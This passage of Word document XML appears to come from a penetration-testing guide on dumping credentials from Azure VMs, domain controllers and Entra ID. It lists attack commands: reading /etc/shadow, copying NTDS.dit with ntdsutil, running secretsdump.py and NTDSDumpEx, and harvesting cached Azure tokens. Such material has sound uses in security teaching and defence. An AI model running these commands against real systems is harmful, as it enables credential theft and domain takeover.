          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>sudo cat /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BFA027" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve">Crack hashes offline with john or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536FE856" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>For Azure AD joined Linux VMs, tokens may be cached locally (e.g., in .azure/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>accessTokens.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>), and token extraction tools (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>AzureADPwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>) can be used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073101F0" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r>
        <w:pict w14:anchorId="53CC6F4E">
          <v:rect id="_x0000_i1044" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E240DBB" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Part 3: Microsoft Entra ID (Azure AD) Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482FABF4" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve">No local </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>NTDS.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t>; credentials are cloud-managed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E49491" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>Focus on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47247237" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>Token harvesting (PowerShell scripts, memory scraping)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3E8544" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>Exploiting weak app registrations or delegated permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658B6103" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve">Using tools like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AzureADPwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MSOLSpray</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00987D73">
        <w:t xml:space="preserve"> to dump tokens or escalate privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F158BBA" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:t>Leveraging Azure AD Connect sync server compromises to extract on-prem AD credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689E3E07" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r>
        <w:pict w14:anchorId="64D6EE7B">
          <v:rect id="_x0000_i1045" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BE7C1F" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerabilities Exploited During Credential Dumping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23"/>
        <w:gridCol w:w="5493"/>
      </w:tblGrid>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="00987D73" w14:paraId="3CF1B418" w14:textId="77777777" w:rsidTr="0039559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AC621E" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00987D73">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Vulnerability / Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F3CDCDB" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00987D73">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Explanation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="00987D73" w14:paraId="456ADE40" w14:textId="77777777" w:rsidTr="003955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96E432" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Elevated privileges on VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7ABD2615" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Required SYSTEM or Administrator access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="00987D73" w14:paraId="6CBD9640" w14:textId="77777777" w:rsidTr="003955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DD295F" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>NTDS.dit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00987D73">
              <w:t xml:space="preserve"> and SYSTEM hive access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5288FF79" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Improper file permissions or lack of disk encryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="00987D73" w14:paraId="1418FE79" w14:textId="77777777" w:rsidTr="003955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3A1886" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Unpatched DCs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FCBAF83" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Vulnerable to dumping or exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="00987D73" w14:paraId="1C1BB890" w14:textId="77777777" w:rsidTr="003955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E71F2E" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Weak Azure AD app permissions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46A3FC88" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Excessive delegated rights enabling token abuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="00987D73" w14:paraId="3CE0F02A" w14:textId="77777777" w:rsidTr="003955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8426E7" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:lastRenderedPageBreak/>
              <w:t>Cached tokens on Azure AD joined machines</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5ED56DC4" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Token reuse and theft</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1C6A4DAE" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:r>
        <w:pict w14:anchorId="2487DB26">
          <v:rect id="_x0000_i1046" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3532DE8F" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="00995D7A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00987D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>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4"/>
        <w:gridCol w:w="4699"/>
        <w:gridCol w:w="1905"/>
        <w:gridCol w:w="2102"/>
      </w:tblGrid>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="00987D73" w14:paraId="4E99A228" w14:textId="77777777" w:rsidTr="0039559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90DF53" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00987D73">
              <w:rPr>
                <w:b/>
                <w:bCs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7FD46903" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00987D73">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tool/Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12CD8DA8" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00987D73">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72C0195B" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00987D73">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Outcome</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="00987D73" w14:paraId="343C796A" w14:textId="77777777" w:rsidTr="003955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EEBA29" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Identify Domain Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F68AABC" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>nltest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00987D73">
              <w:t xml:space="preserve"> /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>dsgetdc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>:&lt;domain&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D6AC13E" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Windows VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73844448" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Confirm DC presence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="00987D73" w14:paraId="40F417B8" w14:textId="77777777" w:rsidTr="003955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0AA9B5" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t xml:space="preserve">Dump </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>NTDS.dit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00987D73">
              <w:t xml:space="preserve"> &amp; SYSTEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="271D4232" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>ntdsutil.exe with PowerShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28814FE8" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Windows DC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03E345A9" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t xml:space="preserve">Copies </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>NTDS.dit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00987D73">
              <w:t xml:space="preserve"> &amp; SYSTEM files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="00987D73" w14:paraId="76E9B687" w14:textId="77777777" w:rsidTr="003955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3ED7F1" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Offline Hash Dump</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58EF1A2E" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>secretsdump.py -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>ntds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00987D73">
              <w:t xml:space="preserve"> &lt;file&gt; -system &lt;file&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67CC4A9F" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Attacker machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2357B5E4" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>NTLM hashes dumped</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="00987D73" w14:paraId="33C1271B" w14:textId="77777777" w:rsidTr="003955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0C5CEA" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>DSInternals</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00987D73">
              <w:t xml:space="preserve"> Dump</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18557139" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>PowerShell cmdlets Get-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>BootKey</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00987D73">
              <w:t xml:space="preserve"> and Get-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>ADDBAccount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0E5670F" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Windows machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BAF6BA4" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Extract domain hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="00987D73" w14:paraId="003A20BC" w14:textId="77777777" w:rsidTr="003955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05F6F3" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>NTDSDumpEx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3DF8E56" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>NTDSDumpEx.exe -d &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>ntds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>&gt; -s &lt;system&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72644CB6" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Windows or attacker machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CDFC94C" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>User hashes dumped</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="00987D73" w14:paraId="2A4FC80B" w14:textId="77777777" w:rsidTr="003955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0681A5" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Remote NTDS location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01A87D60" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Metasploit post/windows/gather/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>ntds_location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7DE72FD" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Remote session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BEE26B4" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t xml:space="preserve">Locate </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00987D73">
              <w:t>NTDS.dit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00987D73">
              <w:t xml:space="preserve"> file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00995D7A" w:rsidRPr="00987D73" w14:paraId="1A24A568" w14:textId="77777777" w:rsidTr="003955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BA2330" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>Local Linux hash dump</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CE4D66E" w14:textId="77777777" w:rsidR="00995D7A" w:rsidRPr="00987D73" w:rsidRDefault="00995D7A" w:rsidP="0039559A">
            <w:r w:rsidRPr="00987D73">
              <w:t>sudo cat /etc/shadow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
